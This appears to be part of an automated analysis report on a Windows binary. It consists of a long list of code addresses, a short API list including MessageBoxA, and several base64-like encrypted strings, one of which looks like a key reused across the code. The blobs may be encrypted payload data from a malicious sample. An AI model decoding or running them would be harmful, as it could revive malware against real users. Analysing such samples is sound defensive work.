                                                                              0x00404af6
                                                                              0x00404b04
                                                                              0x00404b08
                                                                              0x00404b12
                                                                              0x00404b15
                                                                              0x00404b1a
                                                                              0x00404b22
                                                                              0x00404b26
                                                                              0x00404b27
                                                                              0x00404b35
                                                                              0x00404b39
                                                                              0x00404b43
                                                                              0x00404b46
                                                                              0x00404b4b
                                                                              0x00404b53
                                                                              0x00404b57
                                                                              0x00404b58
                                                                              0x00404b66
                                                                              0x00404b6a
                                                                              0x00404b74
                                                                              0x00404b77
                                                                              0x00404b7c
                                                                              0x00404b84
                                                                              0x00404b88
                                                                              0x00404b89
                                                                              0x00404b97
                                                                              0x00404b9b
                                                                              0x00404ba5
                                                                              0x00404ba8
                                                                              0x00404bad
                                                                              0x00404bb5
                                                                              0x00404bb9
                                                                              0x00404bba
                                                                              0x00404bc3
                                                                              0x00404bcc
                                                                              0x00404bd6
                                                                              0x00404bd9
                                                                              0x00404bde
                                                                              0x00404be6
                                                                              0x00404bea
                                                                              0x00404beb
                                                                              0x00404bf9
                                                                              0x00404bfd
                                                                              0x00404c07
                                                                              0x00404c0a
                                                                              0x00404c0f
                                                                              0x00404c17
                                                                              0x00404c1b
                                                                              0x00404c1c
                                                                              0x00404c2a
                                                                              0x00404c2e
                                                                              0x00404c38
                                                                              0x00404c3b
                                                                              0x00404c40
                                                                              0x00404c48
                                                                              0x00404c4c
                                                                              0x00404c4d
                                                                              0x00404c5b
                                                                              0x00404c5f
                                                                              0x00404c69
                                                                              0x00404c6c
                                                                              0x00404c71
                                                                              0x00404c79
                                                                              0x00404c7d
                                                                              0x00404c7e
                                                                              0x00404c8c
                                                                              0x00404c90
                                                                              0x00404c95
                                                                              0x00404c9d
                                                                              0x00404ca2
                                                                              0x00404caa
                                                                              0x00404cae
                                                                              0x00404caf
                                                                              0x00404cbd
                                                                              0x00404cc1
                                                                              0x00404ccb
                                                                              0x00404cce
                                                                              0x00404cd3
                                                                              0x00404cdb
                                                                              0x00404cdf
                                                                              0x00404ce0
                                                                              0x00404cee
                                                                              0x00404cf2
                                                                              0x00404cfc
                                                                              0x00404cff
                                                                              0x00404d04
                                                                              0x00404d0c
                                                                              0x00404d10
                                                                              0x00404d11
                                                                              0x00404d1f
                                                                              0x00404d23
                                                                              0x00404d2d
                                                                              0x00404d30
                                                                              0x00404d35
                                                                              0x00404d3d
                                                                              0x00404d41
                                                                              0x00404d42
                                                                              0x00404d50
                                                                              0x00404d54
                                                                              0x00404d5e
                                                                              0x00404d61
                                                                              0x00404d66
                                                                              0x00404d6e
                                                                              0x00404d72
                                                                              0x00404d73
                                                                              0x00404d81
                                                                              0x00404d85
                                                                              0x00404d8f
                                                                              0x00404d92
                                                                              0x00404d97
                                                                              0x00404d9f
                                                                              0x00404da3
                                                                              0x00404da4
                                                                              0x00404db2
                                                                              0x00404db6
                                                                              0x00404dc0
                                                                              0x00404dc3
                                                                              0x00404dc8
                                                                              0x00404dd0
                                                                              0x00404dd4
                                                                              0x00404dd5
                                                                              0x00404de3
                                                                              0x00404de7
                                                                              0x00404df1
                                                                              0x00404df4
                                                                              0x00404df9
                                                                              0x00404e01
                                                                              0x00404e05
                                                                              0x00404e06
                                                                              0x00404e14
                                                                              0x00404e18
                                                                              0x00404e22
                                                                              0x00404e25
                                                                              0x00404e2a
                                                                              0x00404e32
                                                                              0x00404e36
                                                                              0x00404e37
                                                                              0x00404e45
                                                                              0x00404e49
                                                                              0x00404e53
                                                                              0x00404e56
                                                                              0x00404e5b
                                                                              0x00404e63
                                                                              0x00404e67
                                                                              0x00404e68
                                                                              0x00404e76
                                                                              0x00404e7a
                                                                              0x00404e84
                                                                              0x00404e87
                                                                              0x00404e8c
                                                                              0x00404e94
                                                                              0x00404e98
                                                                              0x00404e99
                                                                              0x00404ea7
                                                                              0x00404eab
                                                                              0x00404eb5
                                                                              0x00404eb8
                                                                              0x00404ebd
                                                                              0x00404ec5
                                                                              0x00404ec9
                                                                              0x00404eca
                                                                              0x00404ed8
                                                                              0x00404edc
                                                                              0x00404ee6
                                                                              0x00404ee9
                                                                              0x00404eee
                                                                              0x00404ef6
                                                                              0x00404efa
                                                                              0x00404efb
                                                                              0x00404f05
                                                                              0x00404f0d
                                                                              0x00404f17
                                                                              0x00404f1a
                                                                              0x00404f1f
                                                                              0x00404f27
                                                                              0x00404f2b
                                                                              0x00404f2c
                                                                              0x00404f3a
                                                                              0x00404f3e
                                                                              0x00404f48
                                                                              0x00404f4b
                                                                              0x00404f50
                                                                              0x00404f58
                                                                              0x00404f5c
                                                                              0x00404f5d
                                                                              0x00404f6b
                                                                              0x00404f6f
                                                                              0x00404f79
                                                                              0x00404f7c
                                                                              0x00404f81
                                                                              0x00404f89
                                                                              0x00404f8d
                                                                              0x00404f8e
                                                                              0x00404f9c
                                                                              0x00404fa0
                                                                              0x00404faa
                                                                              0x00404fad
                                                                              0x00404fb2
                                                                              0x00404fba
                                                                              0x00404fbe
                                                                              0x00404fbf
                                                                              0x00404fcd
                                                                              0x00404fd1
                                                                              0x00404fd7
                                                                              0x00404fde
                                                                              0x00404fe3
                                                                              0x00404feb
                                                                              0x00404fef
                                                                              0x00404ff0
                                                                              0x00404ffe
                                                                              0x00405002
                                                                              0x0040500c
                                                                              0x0040500f
                                                                              0x00405014
                                                                              0x0040501c
                                                                              0x00405020
                                                                              0x00405021
                                                                              0x0040502f
                                                                              0x00405033
                                                                              0x0040503d
                                                                              0x00405040
                                                                              0x00405045
                                                                              0x0040504d
                                                                              0x00405051
                                                                              0x00405052
                                                                              0x00405060
                                                                              0x00405064
                                                                              0x0040506e
                                                                              0x00405071
                                                                              0x00405076
                                                                              0x0040507e
                                                                              0x00405082
                                                                              0x00405083
                                                                              0x00405091
                                                                              0x00405095
                                                                              0x0040509f
                                                                              0x004050a2
                                                                              0x004050a7
                                                                              0x004050af
                                                                              0x004050b3
                                                                              0x004050b4
                                                                              0x004050c2
                                                                              0x004050c6
                                                                              0x004050d0
                                                                              0x004050d3
                                                                              0x004050d8
                                                                              0x004050e0
                                                                              0x004050e4
                                                                              0x004050e5
                                                                              0x004050f3
                                                                              0x004050f7
                                                                              0x00405101
                                                                              0x00405104
                                                                              0x00405109
                                                                              0x00405111
                                                                              0x00405115
                                                                              0x00405116
                                                                              0x00405124
                                                                              0x00405128
                                                                              0x00405132
                                                                              0x00405135
                                                                              0x0040513a
                                                                              0x00405142
                                                                              0x00405146
                                                                              0x00405147
                                                                              0x00405155
                                                                              0x00405159
                                                                              0x00405163
                                                                              0x00405166
                                                                              0x0040516b
                                                                              0x00405173
                                                                              0x00405177
                                                                              0x00405178
                                                                              0x00405186
                                                                              0x0040518a
                                                                              0x00405194
                                                                              0x00405197
                                                                              0x0040519c
                                                                              0x004051a4
                                                                              0x004051a8
                                                                              0x004051a9
                                                                              0x004051b7
                                                                              0x004051bb
                                                                              0x004051c5
                                                                              0x004051c8
                                                                              0x004051cd
                                                                              0x004051d5
                                                                              0x004051d9
                                                                              0x004051da
                                                                              0x004051e8
                                                                              0x004051ec
                                                                              0x004051f6
                                                                              0x004051f9
                                                                              0x004051fe
                                                                              0x00405206
                                                                              0x0040520a
                                                                              0x0040520b
                                                                              0x00405219
                                                                              0x0040521d
                                                                              0x00405227
                                                                              0x0040522a
                                                                              0x0040522f
                                                                              0x00405237
                                                                              0x0040523b
                                                                              0x0040523c
                                                                              0x00405246
                                                                              0x0040524e
                                                                              0x00405258
                                                                              0x0040525b
                                                                              0x00405260
                                                                              0x00405268
                                                                              0x0040526c
                                                                              0x0040526d
                                                                              0x0040527b
                                                                              0x0040527f
                                                                              0x00405289
                                                                              0x0040528c
                                                                              0x00405291
                                                                              0x00405299
                                                                              0x0040529d
                                                                              0x0040529e
                                                                              0x004052ac
                                                                              0x004052b0
                                                                              0x004052ba
                                                                              0x004052bd
                                                                              0x004052c2
                                                                              0x004052ca
                                                                              0x004052ce
                                                                              0x004052cf
                                                                              0x004052dd
                                                                              0x004052e1
                                                                              0x004052eb
                                                                              0x004052ee
                                                                              0x004052f3
                                                                              0x004052fb
                                                                              0x004052ff
                                                                              0x00405300
                                                                              0x0040530e
                                                                              0x00405312
                                                                              0x00405318
                                                                              0x0040531f
                                                                              0x00405324
                                                                              0x0040532c
                                                                              0x00405330
                                                                              0x00405331
                                                                              0x0040533f
                                                                              0x00405343
                                                                              0x0040534d
                                                                              0x00405350
                                                                              0x00405355
                                                                              0x0040535d
                                                                              0x00405361
                                                                              0x00405362
                                                                              0x00405370
                                                                              0x00405374
                                                                              0x0040537e
                                                                              0x00405381
                                                                              0x00405386
                                                                              0x0040538e
                                                                              0x00405392
                                                                              0x00405393
                                                                              0x004053a1
                                                                              0x004053a5
                                                                              0x004053af
                                                                              0x004053b2
                                                                              0x004053b7
                                                                              0x004053bf
                                                                              0x004053c3
                                                                              0x004053c4
                                                                              0x004053d2
                                                                              0x004053d6
                                                                              0x004053e0
                                                                              0x004053e3
                                                                              0x004053eb
                                                                              0x004053f0
                                                                              0x004053f4
                                                                              0x004053f5
                                                                              0x00405403
                                                                              0x00405407
                                                                              0x00405411
                                                                              0x00405414
                                                                              0x00405419
                                                                              0x00405421
                                                                              0x00405425
                                                                              0x00405426
                                                                              0x00405434
                                                                              0x00405438
                                                                              0x00405442
                                                                              0x00405445
                                                                              0x0040544a
                                                                              0x00405452
                                                                              0x00405456
                                                                              0x00405457
                                                                              0x00405465
                                                                              0x00405469
                                                                              0x00405473
                                                                              0x00405476
                                                                              0x0040547b
                                                                              0x00405483
                                                                              0x00405487
                                                                              0x00405488
                                                                              0x00405496
                                                                              0x0040549a
                                                                              0x004054a4
                                                                              0x004054a7
                                                                              0x004054ac
                                                                              0x004054b4
                                                                              0x004054b8
                                                                              0x004054b9
                                                                              0x004054c1
                                                                              0x004054cb
                                                                              0x004054d5
                                                                              0x004054d8
                                                                              0x004054dd
                                                                              0x004054e5
                                                                              0x004054e9
                                                                              0x004054ea
                                                                              0x004054f8
                                                                              0x004054fc
                                                                              0x00405506
                                                                              0x00405509
                                                                              0x0040550e
                                                                              0x00405516
                                                                              0x0040551a
                                                                              0x0040551b
                                                                              0x00405529
                                                                              0x0040552d
                                                                              0x00405537
                                                                              0x0040553a
                                                                              0x0040553f
                                                                              0x00405547
                                                                              0x0040554b
                                                                              0x0040554c
                                                                              0x0040555a
                                                                              0x0040555e
                                                                              0x00405568
                                                                              0x0040556b
                                                                              0x00405570
                                                                              0x00405578
                                                                              0x0040557c
                                                                              0x0040557d
                                                                              0x0040558b
                                                                              0x0040558f
                                                                              0x00405599
                                                                              0x0040559c
                                                                              0x004055a1
                                                                              0x004055a9
                                                                              0x004055ad
                                                                              0x004055ae
                                                                              0x004055bc
                                                                              0x004055c0
                                                                              0x004055ca
                                                                              0x004055cd
                                                                              0x004055d2
                                                                              0x004055da
                                                                              0x004055de
                                                                              0x004055df
                                                                              0x004055ed
                                                                              0x004055f1
                                                                              0x004055fb
                                                                              0x004055fe
                                                                              0x00405603
                                                                              0x0040560b
                                                                              0x0040560f
                                                                              0x00405610
                                                                              0x0040561e
                                                                              0x00405622
                                                                              0x0040562c
                                                                              0x0040562f
                                                                              0x00405634
                                                                              0x0040563c
                                                                              0x00405640
                                                                              0x00405641
                                                                              0x0040564f
                                                                              0x00405653
                                                                              0x0040565d
                                                                              0x00405660
                                                                              0x00405665
                                                                              0x0040566d
                                                                              0x00405671
                                                                              0x00405672
                                                                              0x00405680
                                                                              0x00405684
                                                                              0x0040568e
                                                                              0x00405691
                                                                              0x00405696
                                                                              0x0040569e
                                                                              0x004056a2
                                                                              0x004056a3
                                                                              0x004056b1
                                                                              0x004056b5
                                                                              0x004056bf
                                                                              0x004056c2
                                                                              0x004056c7
                                                                              0x004056cf
                                                                              0x004056d3
                                                                              0x004056d4
                                                                              0x004056e2
                                                                              0x004056e6
                                                                              0x004056f0
                                                                              0x004056f3
                                                                              0x004056f8
                                                                              0x00405700
                                                                              0x00405704
                                                                              0x00405705
                                                                              0x00405713
                                                                              0x00405717
                                                                              0x00405721
                                                                              0x00405724
                                                                              0x00405729
                                                                              0x00405731
                                                                              0x00405735
                                                                              0x00405736
                                                                              0x00405744
                                                                              0x00405748
                                                                              0x00405752
                                                                              0x00405755
                                                                              0x0040575a
                                                                              0x00405762
                                                                              0x00405766
                                                                              0x00405767
                                                                              0x00405775
                                                                              0x00405779
                                                                              0x00405783
                                                                              0x00405786
                                                                              0x0040578b
                                                                              0x00405793
                                                                              0x00405797
                                                                              0x00405798
                                                                              0x004057a6
                                                                              0x004057aa
                                                                              0x004057b4
                                                                              0x004057b7
                                                                              0x004057bc
                                                                              0x004057c4
                                                                              0x004057c8
                                                                              0x004057c9
                                                                              0x004057d7
                                                                              0x004057db
                                                                              0x004057e5
                                                                              0x004057e8
                                                                              0x004057ed
                                                                              0x004057f5
                                                                              0x004057f9
                                                                              0x004057fa
                                                                              0x00405802
                                                                              0x0040580c
                                                                              0x00405816
                                                                              0x00405819
                                                                              0x0040581e
                                                                              0x00405826
                                                                              0x0040582a
                                                                              0x0040582b
                                                                              0x00405839
                                                                              0x0040583d
                                                                              0x00405847
                                                                              0x0040584a
                                                                              0x0040584f
                                                                              0x00405857
                                                                              0x0040585b
                                                                              0x0040585c
                                                                              0x0040586a
                                                                              0x0040586e
                                                                              0x00405878
                                                                              0x0040587b
                                                                              0x00405880
                                                                              0x00405888
                                                                              0x0040588c
                                                                              0x0040588d
                                                                              0x0040589b
                                                                              0x0040589f
                                                                              0x004058a9
                                                                              0x004058ac
                                                                              0x004058b1
                                                                              0x004058b9
                                                                              0x004058bd
                                                                              0x004058be
                                                                              0x004058cc
                                                                              0x004058d0
                                                                              0x004058d5
                                                                              0x004058dd
                                                                              0x004058e2
                                                                              0x004058ea
                                                                              0x004058ee
                                                                              0x004058ef
                                                                              0x004058fd
                                                                              0x00405901
                                                                              0x0040590b
                                                                              0x0040590e
                                                                              0x00405913
                                                                              0x0040591b
                                                                              0x0040591f
                                                                              0x00405920
                                                                              0x0040592e
                                                                              0x00405932
                                                                              0x0040593c
                                                                              0x0040593f
                                                                              0x00405944
                                                                              0x0040594c
                                                                              0x00405950
                                                                              0x00405951
                                                                              0x0040595f
                                                                              0x00405963
                                                                              0x0040596d
                                                                              0x00405970
                                                                              0x00405975
                                                                              0x0040597d
                                                                              0x00405981
                                                                              0x00405982
                                                                              0x00405990
                                                                              0x00405994
                                                                              0x0040599e
                                                                              0x004059a1
                                                                              0x004059a6
                                                                              0x004059ae
                                                                              0x004059b2
                                                                              0x004059b3
                                                                              0x004059c1
                                                                              0x004059c5
                                                                              0x004059cf
                                                                              0x004059d2
                                                                              0x004059d7
                                                                              0x004059df
                                                                              0x004059e3
                                                                              0x004059e4
                                                                              0x004059f2
                                                                              0x004059f6
                                                                              0x00405a00
                                                                              0x00405a03
                                                                              0x00405a08
                                                                              0x00405a10
                                                                              0x00405a14
                                                                              0x00405a15
                                                                              0x00405a23
                                                                              0x00405a27
                                                                              0x00405a31
                                                                              0x00405a34
                                                                              0x00405a39
                                                                              0x00405a41
                                                                              0x00405a45
                                                                              0x00405a46
                                                                              0x00405a54
                                                                              0x00405a58
                                                                              0x00405a62
                                                                              0x00405a65
                                                                              0x00405a6a
                                                                              0x00405a72
                                                                              0x00405a76
                                                                              0x00405a77
                                                                              0x00405a85
                                                                              0x00405a89
                                                                              0x00405a93
                                                                              0x00405a96
                                                                              0x00405a9b
                                                                              0x00405aa3
                                                                              0x00405aa7
                                                                              0x00405aa8
                                                                              0x00405ab6
                                                                              0x00405aba
                                                                              0x00405ac4
                                                                              0x00405ac7
                                                                              0x00405acc
                                                                              0x00405ad4
                                                                              0x00405ad8
                                                                              0x00405ad9
                                                                              0x00405ae7
                                                                              0x00405aeb
                                                                              0x00405af5
                                                                              0x00405af8
                                                                              0x00405afd
                                                                              0x00405b05
                                                                              0x00405b09
                                                                              0x00405b0a
                                                                              0x00405b18
                                                                              0x00405b1c
                                                                              0x00405b26
                                                                              0x00405b29
                                                                              0x00405b2e
                                                                              0x00405b36
                                                                              0x00405b3a
                                                                              0x00405b3b
                                                                              0x00405b44
                                                                              0x00405b4d
                                                                              0x00405b57
                                                                              0x00405b5a
                                                                              0x00405b5f
                                                                              0x00405b67
                                                                              0x00405b6b
                                                                              0x00405b6c
                                                                              0x00405b7a
                                                                              0x00405b7e
                                                                              0x00405b88
                                                                              0x00405b8b
                                                                              0x00405b90
                                                                              0x00405b98
                                                                              0x00405b9c
                                                                              0x00405b9d
                                                                              0x00405bab
                                                                              0x00405baf
                                                                              0x00405bb9
                                                                              0x00405bbc
                                                                              0x00405bc1
                                                                              0x00405bc9
                                                                              0x00405bcd
                                                                              0x00405bce
                                                                              0x00405bdc
                                                                              0x00405be0
                                                                              0x00405bea
                                                                              0x00405bed
                                                                              0x00405bf2
                                                                              0x00405bfa
                                                                              0x00405bfe
                                                                              0x00405bff
                                                                              0x00405c0d
                                                                              0x00405c11
                                                                              0x00405c16
                                                                              0x00405c1e
                                                                              0x00405c23
                                                                              0x00405c2b
                                                                              0x00405c2f
                                                                              0x00405c30
                                                                              0x00405c3e
                                                                              0x00405c42
                                                                              0x00405c4c
                                                                              0x00405c4f
                                                                              0x00405c54
                                                                              0x00405c5c
                                                                              0x00405c60
                                                                              0x00405c61
                                                                              0x00405c6f
                                                                              0x00405c73
                                                                              0x00405c7d
                                                                              0x00405c80
                                                                              0x00405c85
                                                                              0x00405c8d
                                                                              0x00405c91
                                                                              0x00405c92
                                                                              0x00405ca0
                                                                              0x00405ca4
                                                                              0x00405cae
                                                                              0x00405cb1
                                                                              0x00405cb6
                                                                              0x00405cbe
                                                                              0x00405cc2
                                                                              0x00405cc3
                                                                              0x00405cd1
                                                                              0x00405cd5
                                                                              0x00405cdf
                                                                              0x00405ce2
                                                                              0x00405ce7
                                                                              0x00405cef
                                                                              0x00405cf3
                                                                              0x00405cf4
                                                                              0x00405d02
                                                                              0x00405d06
                                                                              0x00405d10
                                                                              0x00405d13
                                                                              0x00405d18
                                                                              0x00405d20
                                                                              0x00405d24
                                                                              0x00405d25
                                                                              0x00405d33
                                                                              0x00405d37
                                                                              0x00405d41
                                                                              0x00405d44
                                                                              0x00405d49
                                                                              0x00405d51
                                                                              0x00405d55
                                                                              0x00405d56
                                                                              0x00405d64
                                                                              0x00405d68
                                                                              0x00405d72
                                                                              0x00405d75
                                                                              0x00405d7a
                                                                              0x00405d82
                                                                              0x00405d86
                                                                              0x00405d87
                                                                              0x00405d95
                                                                              0x00405d99
                                                                              0x00405da3
                                                                              0x00405da6
                                                                              0x00405dab
                                                                              0x00405db3
                                                                              0x00405db7
                                                                              0x00405db8
                                                                              0x00405dc6
                                                                              0x00405dca
                                                                              0x00405dd4
                                                                              0x00405dd7
                                                                              0x00405ddc
                                                                              0x00405de4
                                                                              0x00405de8
                                                                              0x00405de9
                                                                              0x00405df7
                                                                              0x00405dfb
                                                                              0x00405e05
                                                                              0x00405e08
                                                                              0x00405e0d
                                                                              0x00405e15
                                                                              0x00405e19
                                                                              0x00405e1a
                                                                              0x00405e28
                                                                              0x00405e2c
                                                                              0x00405e36
                                                                              0x00405e39
                                                                              0x00405e3e
                                                                              0x00405e46
                                                                              0x00405e4a
                                                                              0x00405e4b
                                                                              0x00405e59
                                                                              0x00405e5d
                                                                              0x00405e67
                                                                              0x00405e6a
                                                                              0x00405e6f
                                                                              0x00405e77
                                                                              0x00405e7b
                                                                              0x00405e7c
                                                                              0x00405e86
                                                                              0x00405e8e
                                                                              0x00405e98
                                                                              0x00405e9b
                                                                              0x00405ea0
                                                                              0x00405ea8
                                                                              0x00405eac
                                                                              0x00405ead
                                                                              0x00405ebb
                                                                              0x00405ebf
                                                                              0x00405ec9
                                                                              0x00405ecc
                                                                              0x00405ed1
                                                                              0x00405ed9
                                                                              0x00405edd
                                                                              0x00405ede
                                                                              0x00405eec
                                                                              0x00405ef0
                                                                              0x00405efa
                                                                              0x00405efd
                                                                              0x00405f02
                                                                              0x00405f0a
                                                                              0x00405f0e
                                                                              0x00405f0f
                                                                              0x00405f1d
                                                                              0x00405f21
                                                                              0x00405f2b
                                                                              0x00405f2e
                                                                              0x00405f37
                                                                              0x00405f3a
                                                                              0x00405f3d
                                                                              0x00405f40
                                                                              0x00405f42
                                                                              0x00405f42
                                                                              0x00405f5b
                                                                              0x00405f67
                                                                              0x00405f6f
                                                                              0x00405f79
                                                                              0x00405f79
                                                                              0x00405f84
                                                                              0x00405f91
                                                                              0x00405f99

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00403C36
                                                                                • Part of subcall function 00401D2E: __EH_prolog.LIBCMT ref: 00401D33
                                                                                • Part of subcall function 00401D2E: _strlen.LIBCMT ref: 00401D49
                                                                                • Part of subcall function 00403BA9: _strlen.LIBCMT ref: 00403BB0
                                                                                • Part of subcall function 00403BE3: __EH_prolog.LIBCMT ref: 00403BE8
                                                                              • MessageBoxA.USER32 ref: 00405F79
                                                                              Strings
                                                                              • oXs2g+NM9Hvbq2vWAcebzffEgV8qtlJKfNaAe26+vfhIpPVCBqHDf62dq8WDlYkTnHpzvK7yvZtscER5y21EhOaQ2Lvz0MD6lscCOFsz9LOZUb0PYv3XJ6lcY7+EXhmA+/RIfxC9hDdQ6ORNooB6d4b+mT1ISmVjuuwDDMYIQJMVrZtIGtSHDR1OJSc04k83P1ezQGcOvqtlOMK9VGrUO0QGUTHluLxX1KurTRSZAyTB103OVShHZRiKeOSpLMxCKwNl, xrefs: 0040489D
                                                                              • yy7B2reQT9xJu6Lp0zHMhzxg/mrHM6PHPN4Npnu19xprItpszQXhlt+A0m1ixGxmOTrFciRKGtHwI3YlM9TdRqzUoFR6HDw7CN3D+MA/WJZvGYBIvAWhN8iv7rP4LQ66NP+fu/I3A6VCyfNEPo3D1I9nU2vewpqRsC274ssX3SGBqXXEAwRhyegEnTsh2TgvmXXCD6OEKUpgLZ/cz0qdrthjdxzBZwOKh2sEQmfjFdjDauQNx9vVY76W5S8Lr4rM5Ip+, xrefs: 004046B3
                                                                              • s91ety3T2bOs2CGJuLtObDki5ak3NH9VaDnOHyE3Uudf1g4Je48oI3GYkDEHcPSFIXY3IfDG9SGppouOAg6Ls7reoKKJblcC5pkUg/XuiY53t5k6bgZr8VinUSBaRSkuOTP2hC6OYN1HqTx+bHyYlkaWSm95sPRPCCPOUwxu8ieIFNxbNiqgyzuvo4kH5qQeU6VKqeHNedCCG8Dd8F5M8cXp0zL6jx9Y7XZ0IFlQRESZkp0W1Md996smq4mvDCOPkD36, xrefs: 004042DF
                                                                              • BtGEUcQSWoE3eGyaiUS9Xjva8pgntSpiRL2JKvfeHtUSKi98VekL4158fpDKpaOUaU1BZsD37m1+cPi990KYMGgKb186xa3Kckm31+pKHLLVELd3a02G4R/k0dSQj0TNtH285PaXj4E8xyJG6V4yRcNhdwe9Oizwc0A8b6mK3Hs+y8E4mimp8IRO/e83fYyexPgLXwOFDYPXer920QZafpWv+fhCCadtZKejLOQijgE3qE01i811XKSZvn0yRaF5R9Ol, xrefs: 0040581E
                                                                              • C7/Gv0SXegoWOJWLlXY+R4kTHY1FkvKIMCk1mUha7Sn8+Gni2hGWIACl5PH5m6KIO1dGiP3Z5ncSzg8Wzh1XRkrX2jgzrFNUU1JeziR2tOU38vNfgjX9YPZwUtKhsdUfEy8kdFseUjqxPLi3skzjm/42Lejc/C+qERQfsxaM6i2XrTZQW9HpWf56/I69Oi8XpuvuuyN1FfKEyjxgPgeL6S0FKcIhWtqxe/liDdw2qY6cMbfLxxaUAPNLeAwPBPBsq6yb, xrefs: 00405C85
                                                                              • PQ8HQ8LagtI7bWNwUyTgIVxTY5q6Um7KOmdiOu0PULPjw7ap2q/c3qLT1bxpNXA8FewxOhmygJHUjCgwVRu0nRNzAVcuzai2bUx5T3il0mECASSRfWt3SP5IunBugWvBl3WLAiwuVxYIT1iIciMls9qLpm2r8HfA2VM6+LkgLmAXfR8A14VNRS3aoSSGReayAXB2GuPuWAd3QzokcetuRc5r7Ef9y+W13y2zJt1pimf5rme10Om2kHYwCLvElkPQXhcP, xrefs: 00404F50
                                                                              • WxVnTazsUcY2zAem7NyRefuAG9mQlQFQnVgwpWKgduAzCy4t5SYSoIwB1DLfuMIejhJtlVsfMeH+TYCWDXbPlclMa6EGfGBL0dpwn6xRHXx+swboJZCwFlzdfCUZcuwLCzXL7WCX4zWDB0MIFVFoZATv7bcAb7L9h7h2cb7ERisGplh7tst0L5hn/7QkLpGFOWQ9f0KmGr0ntUaEmezkLuRxn8EOH/xLOisoUxszTOlyCitL9nRoMBI9vzWuz6RpiuRe, xrefs: 00405014
                                                                              • q}?OVQPpOWQx9b8PK*w|Ke78z?zLRL47tDuXbd%a~IZ, xrefs: 00403C5C, 00403CA0, 00403CD4, 00403D05, 00403D36, 00403D67, 00403D98, 00403DC9, 00403DFA, 00403E2B, 00403E5C, 00403E8D, 00403EBE, 00403EEF, 00403F20, 00403F51, 00403F82, 00403FB3, 00403FE4, 00404015, 00404046, 00404077, 004040A8, 004040D9, 0040410A, 0040413B, 0040416C, 0040419D, 004041CE, 004041FF, 00404230, 00404261, 00404292, 004042C3, 004042F4, 00404325, 00404356, 00404387, 004043B8, 004043E9, 0040441A, 0040444B, 0040447C, 004044AD, 004044DE, 0040450F, 00404544, 00404571, 004045A2, 004045D3, 00404604, 00404635, 00404666, 00404697, 004046C8, 004046F9, 0040472A, 0040475B, 0040478C, 004047BD, 004047EE, 0040481F, 00404850, 00404885, 004048B2, 004048E3, 00404914, 00404945, 00404976, 004049A7, 004049D8, 00404A09, 00404A3A, 00404A6B, 00404A9C, 00404ACD, 00404AFE, 00404B2F, 00404B60, 00404B91, 00404BC2, 00404BF3, 00404C24, 00404C55, 00404C86, 00404CB7, 00404CE8, 00404D19, 00404D4A, 00404D7B, 00404DAC, 00404DDD, 00404E0E, 00404E3F, 00404E70, 00404EA1, 00404ED2, 00404F03, 00404F34, 00404F65, 00404F96, 00404FC7, 00404FF8, 00405029, 0040505A, 0040508B, 004050BC, 004050ED, 0040511E, 0040514F, 00405180, 004051B1, 004051E2, 00405213, 00405244, 00405275, 004052A6, 004052D7, 00405308, 00405339, 0040536A, 0040539B, 004053CC, 004053FD, 0040542E, 0040545F, 00405490, 004054C5, 004054F2, 00405523, 00405554, 00405585, 004055B6, 004055E7, 00405618, 00405649, 0040567A, 004056AB, 004056DC, 0040570D, 0040573E, 0040576F, 004057A0, 004057D1, 00405806, 00405833, 00405864, 00405895, 004058C6, 004058F7, 00405928, 00405959, 0040598A, 004059BB, 004059EC, 00405A1D, 00405A4E, 00405A7F, 00405AB0, 00405AE1, 00405B12, 00405B43, 00405B74, 00405BA5, 00405BD6, 00405C07, 00405C38, 00405C69, 00405C9A, 00405CCB, 00405CFC, 00405D2D, 00405D5E, 00405D8F, 00405DC0, 00405DF1, 00405E22, 00405E53, 00405E84, 00405EB5, 00405EE6, 00405F17
                                                                              • s4tlXVPOMGFvqPw/6eGlwNMduwZb6VzRMbh45lqQOuEhWf75YEIYObFaRYpkX0DTyZ0K2g1lkkEQ1WNA/yT3GL47+sI1RBdTJbXdHuplNvyW1KnriaNb5XnQlca3BSS454khf6+cUCyieHLR6FtKfcuCmcQuG48Bmi/t1NVyRmQDPOyPMsN/KRy45xSgeHR77NAWiDjo1CDIsGeQNMwgwafkPWampSRLDrb3Qt6g+3wfyVXe9qNSbq4THhF0GiKLwi1p, xrefs: 00405E6F
                                                                              • wW9XNPDTEAPrqhsslw8NtbU848vfKRWh5EJDakfDpm1s7NtqfXVK3qqADncw6caAQRCU1a3AOcKSVcn6f1vPyhql7aO0vW+yMk9iVnO266QtG58VJ7TloS0J1UPtam2oFQSY7BQkSFXQy4LKpLm1IBsJkXOxB+LrFerFHvLUkU0ZbfAF7aQq8Kdrup4zeOpT5w5NGCWDDSDiCe7r2pEcTNuhn+9KBJTAaMGj/OcLww9HQBGaGm1FSptnNAJPBB6D4U+1, xrefs: 0040480A
                                                                              • 1H9plKqM5eAsipr8KO/x1/G2aLBvASP+gRInrIcsCqEgJe7K+JRQI3N+DYEzO7M8ImzaK8zMwvVw9y75YP47qIKNcJ6NFb9aKylDC/2Rd7kuSGZzACUlC4JJxSy1TXdcVmW+QgEsQXZjwS0otN/SSRNtRbzTImIghzjhxb4duTLnd41y+A1zPHkTw0ogjK7tD51rm9ZM+VrYdFtvGZjOpzE/mw/Py7hYFFbhS1Wo1jyC8olg0L8PC9B9fbhgVKww7QqV, xrefs: 00405291
                                                                              • 99i64/K7/+u1jPL/30BETt0xAY0tnASeT94aqwIgFSMINnKod1gUvXZZ2UrgSL88LZwYlwe4Mh6wuxGcqUCNp7V8Y58xRfCr9n1V9fdxeKUGA9Pf7GOvHnULYUIOVQMnOpT9XNVS63qP/yUC42Xa7rSCQvS79mCftKoNuRYoWCCPtNgve2ZtnRxTQWE1cMLP26ONJn3jT7T2cTYclnbcG/V2l+KKH4JQ3P1j0QF245b6jrhaA7x3xs/oEENwV9EYG2uF, xrefs: 00404B4B
                                                                              • Kg9jo8txN2xEdEz1hPMMMrC70KZSN/0/c54tSWUNalGp80Z2CVO+7AiMygPBM/i5FrzBGw3bHdsnjkjj4eny23Ro/J/ibw96IIvcFAnl7cTktfidpFqk4e+eS5pbO0UlZjvubG+chYYD5W9SfrRtKN10lDmKHg5vG87Dv6d17Y0gsj8uy2GtlIpk4BLPtZptfyeV6oV3d0sVEZAiC6v8Uxt7AXnYIU8Iv7/UjuUEhnDBvEbEokHN6yn4+wyQeqkAKN8D, xrefs: 00405EA0
